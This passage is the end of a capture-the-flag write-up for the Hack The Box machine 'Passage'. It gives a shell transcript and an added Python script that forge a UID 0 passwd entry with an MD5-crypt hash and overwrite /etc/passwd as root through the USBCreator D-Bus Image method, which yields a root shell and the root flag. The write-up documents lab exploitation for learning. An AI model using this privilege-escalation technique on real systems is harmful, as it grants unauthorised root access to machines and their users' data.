kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
nadav@passage:~$ ls
Desktop Downloads Pictures Templates examples.desktop
Documents Music Public Videos passwd
nadav@passage:~$ cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
nadav@passage:~$ pwd
/home/nadav
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true
()
nadav@passage:~$ tail -3 /etc/passwd
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
shiyan:$1$z5ZN2u.x$d2Dxv6yt5qcCgkSvjalhG.:0:0:pwned:/root:/bin/bash
nadav@passage:~$ su -shiyan
Password:
su: Authentication failure
nadav@passage:~$ su -shiyan
Password:
su: Authentication failure
nadav@passage:~$

31. Switch to the new user and grab the final flag

nadav@passage:~$ su shiyan
Password:
root@passage:/home/nadav# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:/home/nadav# cat /root/root.txt
abbe695cf002028f0d9965796e775e52
root@passage:/home/nadav#
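The procedure in steps 29 to 31, as an added example that is not code from the original writeup or from the reference post: it reimplements the MD5-crypt scheme behind openssl passwd -1 so the hash can be produced anywhere, validates the new passwd entry before staging it (which would have rejected the six-field line appended by mistake above), and builds the exact gdbus invocation used on the box. The username shiyan, the salt z5ZN2u.x and the SAMPLE_PASSWD tail are taken from the transcript; the function names are mine, and nothing is sent to D-Bus unless run=True is passed.

```python
import hashlib
import shlex
import subprocess

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Tail of /etc/passwd as shown in the transcript (constructed sample file)
SAMPLE_PASSWD = """\
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
"""


def _to64(value, count):
    # crypt's 6-bit encoding, least significant group first
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5_crypt(password, salt):
    """MD5-crypt ($1$), the scheme `openssl passwd -1` uses; salt is at most 8 chars."""
    pw, sb = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for n in range(len(pw), 0, -16):           # mix in alt, 16 bytes per chunk of password
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:                                   # one byte per bit of len(password)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                      # the fixed 1000-round stretch
        r = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            r.update(sb)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    enc += _to64(final[11], 2)
    return f"$1${sb.decode()}${enc}"


def passwd_entry(user, pw_hash, uid=0, gid=0, gecos="pwned", home="/root", shell="/bin/bash"):
    """A UID 0 entry whose password field holds the hash directly; because the
    field is not 'x', PAM never consults /etc/shadow for this user."""
    return f"{user}:{pw_hash}:{uid}:{gid}:{gecos}:{home}:{shell}"


def validate_entry(line):
    """Reject malformed lines such as the six-field one appended first in the
    transcript, where the username was missing."""
    fields = line.split(":")
    if len(fields) != 7:
        return False, f"expected 7 fields, got {len(fields)}"
    user, _, uid, gid, _, home, shell = fields
    if not user or user.startswith("$"):
        return False, "missing username"
    if not (uid.isdigit() and gid.isdigit()):
        return False, "uid/gid must be numeric"
    if not (home.startswith("/") and shell.startswith("/")):
        return False, "home and shell must be absolute paths"
    return True, "ok"


def build_passwd(original, entry):
    """Append the validated entry to a copy of the original file contents."""
    ok, why = validate_entry(entry)
    if not ok:
        raise ValueError(why)
    return original.rstrip("\n") + "\n" + entry + "\n"


def usbcreator_image_argv(src, dst):
    """Image(source, target, allow_unsafe) copies src over dst as root; with the
    polkit rule on this box no password is asked of a sudo-group member."""
    return ["gdbus", "call", "--system", "--dest", "com.ubuntu.USBCreator",
            "--object-path", "/com/ubuntu/USBCreator",
            "--method", "com.ubuntu.USBCreator.Image", src, dst, "true"]


def overwrite_passwd(staged_path, run=False):
    """Return the shell command used on the box; only talk to D-Bus when run=True."""
    argv = usbcreator_image_argv(staged_path, "/etc/passwd")
    if run:
        subprocess.run(argv, check=True)
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    entry = passwd_entry("shiyan", md5_crypt("shiyan", "z5ZN2u.x"))
    print(build_passwd(SAMPLE_PASSWD, entry))
    print(overwrite_passwd("/home/nadav/passwd"))   # then: su shiyan
```

Staging the file under the user's own home and validating it first matters because the D-Bus method replaces /etc/passwd wholesale: a malformed or truncated copy can lock every account out of the box, and there is no sudo to fall back on.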

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/275


Passage-htb-writeup
https://sh1yan.top/2024/01/12/Passage-htb-writeup/
Author: shiyan
Published: 12 January 2024